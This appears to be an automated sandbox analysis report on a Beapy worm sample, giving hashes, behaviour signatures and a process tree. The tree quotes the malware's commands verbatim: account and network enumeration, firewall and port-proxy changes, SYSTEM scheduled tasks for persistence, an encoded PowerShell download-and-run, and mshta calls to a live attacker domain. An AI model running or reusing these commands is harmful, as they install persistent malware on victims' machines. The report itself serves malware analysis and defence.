Analysis

  • max time kernel
    151s
  • max time network
    153s
  • platform
    windows7_x64
  • resource
    win7v20201028
  • submitted
    05-04-2021 09:28

General

  • Target

    5b29fd421e1874ba8b156dff9494e219c35714ea149865053a88a83108a45ed4.exe

  • Size

    6.6MB

  • MD5

    0909225de438e0b387a0b184e6fcc852

  • SHA1

    1befc5ea0bd95ded2a66c13ceb80a440c69fa039

  • SHA256

    5b29fd421e1874ba8b156dff9494e219c35714ea149865053a88a83108a45ed4

  • SHA512

    b8bc019e408250d2a3dc8142c93bfc63f17f914ec5feda55b9079c81ef17023667462d140c40903db73abbe4be4e1d43cfa9659caf9da350f8bf85807571b0f3

Malware Config

Signatures

  • Beapy

    Beapy is a python worm with crypto mining capabilities.

  • Grants admin privileges 1 TTPs

    Uses net.exe to modify the user's privileges.

  • Modifies Windows Firewall 1 TTPs
  • Loads dropped DLL 20 IoCs
  • Drops file in Windows directory 5 IoCs
  • Detects Pyinstaller 2 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Creates scheduled task(s) 1 TTPs 9 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Gathers network information 2 TTPs 3 IoCs

    Uses commandline utility to view network configuration.

  • Modifies data under HKEY_USERS 53 IoCs
  • Runs net.exe
  • Suspicious behavior: EnumeratesProcesses 8 IoCs
  • Suspicious use of AdjustPrivilegeToken 42 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\5b29fd421e1874ba8b156dff9494e219c35714ea149865053a88a83108a45ed4.exe
    "C:\Users\Admin\AppData\Local\Temp\5b29fd421e1874ba8b156dff9494e219c35714ea149865053a88a83108a45ed4.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:2004
    • C:\Users\Admin\AppData\Local\Temp\5b29fd421e1874ba8b156dff9494e219c35714ea149865053a88a83108a45ed4.exe
      "C:\Users\Admin\AppData\Local\Temp\5b29fd421e1874ba8b156dff9494e219c35714ea149865053a88a83108a45ed4.exe"
      2⤵
      • Loads dropped DLL
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of WriteProcessMemory
      PID:816
      • C:\Windows\SysWOW64\cmd.exe
        cmd /c wmic ntdomain get domainname
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:1012
        • C:\Windows\SysWOW64\Wbem\WMIC.exe
          wmic ntdomain get domainname
          4⤵
          • Suspicious use of AdjustPrivilegeToken
          PID:1652
      • C:\Windows\SysWOW64\cmd.exe
        cmd /c net localgroup administrators
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:660
        • C:\Windows\SysWOW64\net.exe
          net localgroup administrators
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:540
          • C:\Windows\SysWOW64\net1.exe
            C:\Windows\system32\net1 localgroup administrators
            5⤵
              PID:968
        • C:\Windows\SysWOW64\cmd.exe
          cmd /c net group "domain admins" /domain
          3⤵
          • Suspicious use of WriteProcessMemory
          PID:1684
          • C:\Windows\SysWOW64\net.exe
            net group "domain admins" /domain
            4⤵
            • Suspicious use of WriteProcessMemory
            PID:1948
            • C:\Windows\SysWOW64\net1.exe
              C:\Windows\system32\net1 group "domain admins" /domain
              5⤵
                PID:1068
          • C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
            C:\Windows\SysNative\WindowsPowerShell\v1.0\powershell.exe -exec bypass "import-module C:\Users\Admin\AppData\Local\Temp\m2.ps1"
            3⤵
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:1924
          • C:\Windows\SysWOW64\cmd.exe
            C:\Windows\system32\cmd.exe /c ipconfig /all
            3⤵
            • Suspicious use of WriteProcessMemory
            PID:1800
            • C:\Windows\SysWOW64\ipconfig.exe
              ipconfig /all
              4⤵
              • Gathers network information
              PID:1692
          • C:\Windows\SysWOW64\ipconfig.exe
            ipconfig /all
            3⤵
            • Gathers network information
            PID:856
          • C:\Windows\SysWOW64\netstat.exe
            netstat -na
            3⤵
            • Gathers network information
            • Suspicious use of AdjustPrivilegeToken
            PID:852
      • C:\Windows\iskgtxDd.exe
        C:\Windows\iskgtxDd.exe
        1⤵
        • Suspicious use of WriteProcessMemory
        PID:1704
        • C:\Windows\SysWOW64\cmd.exe
          cmd /c call "c:\windows\temp\tmp.vbs"
          2⤵
          • Modifies data under HKEY_USERS
          • Suspicious use of WriteProcessMemory
          PID:888
          • C:\Windows\SysWOW64\WScript.exe
            "C:\Windows\System32\WScript.exe" "C:\windows\temp\tmp.vbs"
            3⤵
            • Modifies data under HKEY_USERS
            PID:532
            • C:\Windows\SysWOW64\cmd.exe
              "C:\Windows\System32\cmd.exe" /c echo gtwOSU >> c:\windows\temp\svchost.exe&echo "*" >c:\windows\temp\ipc.txt&netsh firewall add portopening tcp 65533 DNSd&netsh interface portproxy add v4tov4 listenport=65533 connectaddress=1.1.1.1 connectport=53&copy /y c:\windows\temp\svchost.exe c:\windows\cJISBC.exe&move /y c:\windows\temp\dig.exe c:\windows\lqjqoQ.exe&if exist C:/windows/system32/WindowsPowerShell/ (schtasks /create /ru system /sc MINUTE /mo 50 /st 07:00:00 /tn "\Microsoft\windows\Bluetool" /tr "powershell -ep bypass -e SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAOgAvAC8AdgAuAGIAZQBhAGgAaAAuAGMAbwBtAC8AdgAnACsAJABlAG4AdgA6AFUAUwBFAFIARABPAE0AQQBJAE4AKQA=" /F&schtasks /create /ru system /sc MINUTE /mo 10 /st 07:05:00 /tn cJISBC /tr "C:\Windows\cJISBC.exe" /F&schtasks /create /ru system /sc MINUTE /mo 10 /st 07:00:00 /tn "\boqMquxy" /tr "c:\windows\lqjqoQ.exe" /F) else (start /b sc start Schedule&ping localhost&sc query Schedule|findstr RUNNING&&schtasks /delete /TN Autocheck /f&schtasks /create /ru system /sc MINUTE /mo 50 /ST 07:00:00 /TN Autocheck /tr "cmd.exe /c mshta http://w.beahh.com/page.html?pEIDQHRRL"&schtasks /run /TN Autocheck&start /b sc start Schedule&ping localhost&sc query Schedule|findstr RUNNING&&schtasks /delete /TN Autostart /f&schtasks /create /ru system /sc MINUTE /mo 10 /ST 07:00:00 /TN Autostart /tr "c:\windows\lqjqoQ.exe"&schtasks /run /TN Autostart&start /b sc start Schedule&ping localhost&sc query Schedule|findstr RUNNING&&schtasks /delete /TN escan /f&schtasks /create /ru system /sc MINUTE /mo 10 /ST 07:00:00 /TN escan /tr "c:\windows\cJISBC.exe"&schtasks /run /TN escan)
              4⤵
              • Drops file in Windows directory
              PID:1692
              • C:\Windows\SysWOW64\netsh.exe
                netsh firewall add portopening tcp 65533 DNSd
                5⤵
                • Modifies data under HKEY_USERS
                PID:1576
              • C:\Windows\SysWOW64\netsh.exe
                netsh interface portproxy add v4tov4 listenport=65533 connectaddress=1.1.1.1 connectport=53
                5⤵
                • Modifies data under HKEY_USERS
                PID:2132
              • C:\Windows\SysWOW64\schtasks.exe
                schtasks /create /ru system /sc MINUTE /mo 50 /st 07:00:00 /tn "\Microsoft\windows\Bluetool" /tr "powershell -ep bypass -e SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAOgAvAC8AdgAuAGIAZQBhAGgAaAAuAGMAbwBtAC8AdgAnACsAJABlAG4AdgA6AFUAUwBFAFIARABPAE0AQQBJAE4AKQA=" /F
                5⤵
                • Creates scheduled task(s)
                PID:2344
              • C:\Windows\SysWOW64\schtasks.exe
                schtasks /create /ru system /sc MINUTE /mo 10 /st 07:05:00 /tn cJISBC /tr "C:\Windows\cJISBC.exe" /F
                5⤵
                • Creates scheduled task(s)
                PID:2652
              • C:\Windows\SysWOW64\schtasks.exe
                schtasks /create /ru system /sc MINUTE /mo 10 /st 07:00:00 /tn "\boqMquxy" /tr "c:\windows\lqjqoQ.exe" /F
                5⤵
                • Creates scheduled task(s)
                PID:2324
        • C:\Windows\SysWOW64\cmd.exe
          cmd /c call "c:\windows\temp\tmp.vbs"
          2⤵
          • Modifies data under HKEY_USERS
          PID:2104
          • C:\Windows\SysWOW64\WScript.exe
            "C:\Windows\System32\WScript.exe" "C:\windows\temp\tmp.vbs"
            3⤵
            • Modifies data under HKEY_USERS
            PID:2192
            • C:\Windows\SysWOW64\cmd.exe
              "C:\Windows\System32\cmd.exe" /c echo NXvIoMSN >> c:\windows\temp\svchost.exe&echo "*" >c:\windows\temp\ipc.txt&netsh firewall add portopening tcp 65533 DNSd&netsh interface portproxy add v4tov4 listenport=65533 connectaddress=1.1.1.1 connectport=53&copy /y c:\windows\temp\svchost.exe c:\windows\UfeH.exe&move /y c:\windows\temp\dig.exe c:\windows\VeuxB.exe&if exist C:/windows/system32/WindowsPowerShell/ (schtasks /create /ru system /sc MINUTE /mo 50 /st 07:00:00 /tn "\Microsoft\windows\Bluetool" /tr "powershell -ep bypass -e SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAOgAvAC8AdgAuAGIAZQBhAGgAaAAuAGMAbwBtAC8AdgAnACsAJABlAG4AdgA6AFUAUwBFAFIARABPAE0AQQBJAE4AKQA=" /F&schtasks /create /ru system /sc MINUTE /mo 10 /st 07:05:00 /tn UfeH /tr "C:\Windows\UfeH.exe" /F&schtasks /create /ru system /sc MINUTE /mo 10 /st 07:00:00 /tn "\DrHnIEC" /tr "c:\windows\VeuxB.exe" /F) else (start /b sc start Schedule&ping localhost&sc query Schedule|findstr RUNNING&&schtasks /delete /TN Autocheck /f&schtasks /create /ru system /sc MINUTE /mo 50 /ST 07:00:00 /TN Autocheck /tr "cmd.exe /c mshta http://w.beahh.com/page.html?pEIDQHRRL"&schtasks /run /TN Autocheck&start /b sc start Schedule&ping localhost&sc query Schedule|findstr RUNNING&&schtasks /delete /TN Autostart /f&schtasks /create /ru system /sc MINUTE /mo 10 /ST 07:00:00 /TN Autostart /tr "c:\windows\VeuxB.exe"&schtasks /run /TN Autostart&start /b sc start Schedule&ping localhost&sc query Schedule|findstr RUNNING&&schtasks /delete /TN escan /f&schtasks /create /ru system /sc MINUTE /mo 10 /ST 07:00:00 /TN escan /tr "c:\windows\UfeH.exe"&schtasks /run /TN escan)
              4⤵
              • Drops file in Windows directory
              PID:2200
              • C:\Windows\SysWOW64\netsh.exe
                netsh firewall add portopening tcp 65533 DNSd
                5⤵
                • Modifies data under HKEY_USERS
                PID:1776
              • C:\Windows\SysWOW64\netsh.exe
                netsh interface portproxy add v4tov4 listenport=65533 connectaddress=1.1.1.1 connectport=53
                5⤵
                • Modifies data under HKEY_USERS
                PID:2248
              • C:\Windows\SysWOW64\schtasks.exe
                schtasks /create /ru system /sc MINUTE /mo 50 /st 07:00:00 /tn "\Microsoft\windows\Bluetool" /tr "powershell -ep bypass -e SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAOgAvAC8AdgAuAGIAZQBhAGgAaAAuAGMAbwBtAC8AdgAnACsAJABlAG4AdgA6AFUAUwBFAFIARABPAE0AQQBJAE4AKQA=" /F
                5⤵
                • Creates scheduled task(s)
                PID:2592
              • C:\Windows\SysWOW64\schtasks.exe
                schtasks /create /ru system /sc MINUTE /mo 10 /st 07:05:00 /tn UfeH /tr "C:\Windows\UfeH.exe" /F
                5⤵
                • Creates scheduled task(s)
                PID:2504
              • C:\Windows\SysWOW64\schtasks.exe
                schtasks /create /ru system /sc MINUTE /mo 10 /st 07:00:00 /tn "\DrHnIEC" /tr "c:\windows\VeuxB.exe" /F
                5⤵
                • Creates scheduled task(s)
                PID:2564
      • C:\Windows\WQERpIhb.exe
        C:\Windows\WQERpIhb.exe
        1⤵
          PID:1552
        • C:\Windows\HYTnAnEb.exe
          C:\Windows\HYTnAnEb.exe
          1⤵
            PID:1788
            • C:\Windows\SysWOW64\cmd.exe
              cmd /c call "c:\windows\temp\tmp.vbs"
              2⤵
              • Modifies data under HKEY_USERS
              PID:2540
              • C:\Windows\SysWOW64\WScript.exe
                "C:\Windows\System32\WScript.exe" "C:\windows\temp\tmp.vbs"
                3⤵
                • Modifies data under HKEY_USERS
                PID:2640
                • C:\Windows\SysWOW64\cmd.exe
                  "C:\Windows\System32\cmd.exe" /c echo mBVP >> c:\windows\temp\svchost.exe&echo "*" >c:\windows\temp\hash.txt&netsh firewall add portopening tcp 65533 DNSd&netsh interface portproxy add v4tov4 listenport=65533 connectaddress=1.1.1.1 connectport=53&copy /y c:\windows\temp\svchost.exe c:\windows\UfeH.exe&move /y c:\windows\temp\dig.exe c:\windows\VeuxB.exe&if exist C:/windows/system32/WindowsPowerShell/ (schtasks /create /ru system /sc MINUTE /mo 50 /st 07:00:00 /tn "\Microsoft\windows\Bluetool" /tr "powershell -ep bypass -e SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAOgAvAC8AdgAuAGIAZQBhAGgAaAAuAGMAbwBtAC8AdgAnACsAJABlAG4AdgA6AFUAUwBFAFIARABPAE0AQQBJAE4AKQA=" /F&schtasks /create /ru system /sc MINUTE /mo 10 /st 07:05:00 /tn UfeH /tr "C:\Windows\UfeH.exe" /F&schtasks /create /ru system /sc MINUTE /mo 10 /st 07:00:00 /tn "\LxSz" /tr "c:\windows\VeuxB.exe" /F) else (start /b sc start Schedule&ping localhost&sc query Schedule|findstr RUNNING&&schtasks /delete /TN Autocheck /f&schtasks /create /ru system /sc MINUTE /mo 50 /ST 07:00:00 /TN Autocheck /tr "cmd.exe /c mshta http://w.beahh.com/page.html?pEIDQHRRL"&schtasks /run /TN Autocheck&start /b sc start Schedule&ping localhost&sc query Schedule|findstr RUNNING&&schtasks /delete /TN Autostart /f&schtasks /create /ru system /sc MINUTE /mo 10 /ST 07:00:00 /TN Autostart /tr "c:\windows\VeuxB.exe"&schtasks /run /TN Autostart&start /b sc start Schedule&ping localhost&sc query Schedule|findstr RUNNING&&schtasks /delete /TN escan /f&schtasks /create /ru system /sc MINUTE /mo 10 /ST 07:00:00 /TN escan /tr "c:\windows\UfeH.exe"&schtasks /run /TN escan)
                  4⤵
                  • Drops file in Windows directory
                  PID:2736
                  • C:\Windows\SysWOW64\netsh.exe
                    netsh firewall add portopening tcp 65533 DNSd
                    5⤵
                    • Modifies data under HKEY_USERS
                    PID:1472
                  • C:\Windows\SysWOW64\netsh.exe
                    netsh interface portproxy add v4tov4 listenport=65533 connectaddress=1.1.1.1 connectport=53
                    5⤵
                      PID:2848
                    • C:\Windows\SysWOW64\schtasks.exe
                      schtasks /create /ru system /sc MINUTE /mo 50 /st 07:00:00 /tn "\Microsoft\windows\Bluetool" /tr "powershell -ep bypass -e SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAOgAvAC8AdgAuAGIAZQBhAGgAaAAuAGMAbwBtAC8AdgAnACsAJABlAG4AdgA6AFUAUwBFAFIARABPAE0AQQBJAE4AKQA=" /F
                      5⤵
                      • Creates scheduled task(s)
                      PID:2472
                    • C:\Windows\SysWOW64\schtasks.exe
                      schtasks /create /ru system /sc MINUTE /mo 10 /st 07:05:00 /tn UfeH /tr "C:\Windows\UfeH.exe" /F
                      5⤵
                      • Creates scheduled task(s)
                      PID:1072
                    • C:\Windows\SysWOW64\schtasks.exe
                      schtasks /create /ru system /sc MINUTE /mo 10 /st 07:00:00 /tn "\LxSz" /tr "c:\windows\VeuxB.exe" /F
                      5⤵
                      • Creates scheduled task(s)
                      • Modifies data under HKEY_USERS
                      PID:2848
            • C:\Windows\UWByyzrl.exe
              C:\Windows\UWByyzrl.exe
              1⤵
                PID:2504

              Network

              MITRE ATT&CK Enterprise v6

              Replay Monitor

              Loading Replay Monitor...

              Downloads

              • memory/816-6-0x0000000076641000-0x0000000076643000-memory.dmp

                Filesize

                8KB

              • memory/1924-63-0x000000001AA4A000-0x000000001AA69000-memory.dmp

                Filesize

                124KB

              • memory/1924-53-0x000007FEFC371000-0x000007FEFC373000-memory.dmp

                Filesize

                8KB

              • memory/1924-64-0x000000001B430000-0x000000001B431000-memory.dmp

                Filesize

                4KB

              • memory/1924-62-0x000000001C400000-0x000000001C401000-memory.dmp

                Filesize

                4KB

              • memory/1924-56-0x000000001AAC0000-0x000000001AAC1000-memory.dmp

                Filesize

                4KB

              • memory/1924-60-0x000000001A9A0000-0x000000001A9A1000-memory.dmp

                Filesize

                4KB

              • memory/1924-59-0x000000001AA44000-0x000000001AA46000-memory.dmp

                Filesize

                8KB

              • memory/1924-58-0x000000001AA40000-0x000000001AA42000-memory.dmp

                Filesize

                8KB

              • memory/1924-55-0x0000000002490000-0x0000000002491000-memory.dmp

                Filesize

                4KB

              • memory/1924-57-0x000000001A7D0000-0x000000001A7D1000-memory.dmp

                Filesize

                4KB

              • memory/1924-54-0x000007FEF59F0000-0x000007FEF63DC000-memory.dmp

                Filesize

                9.9MB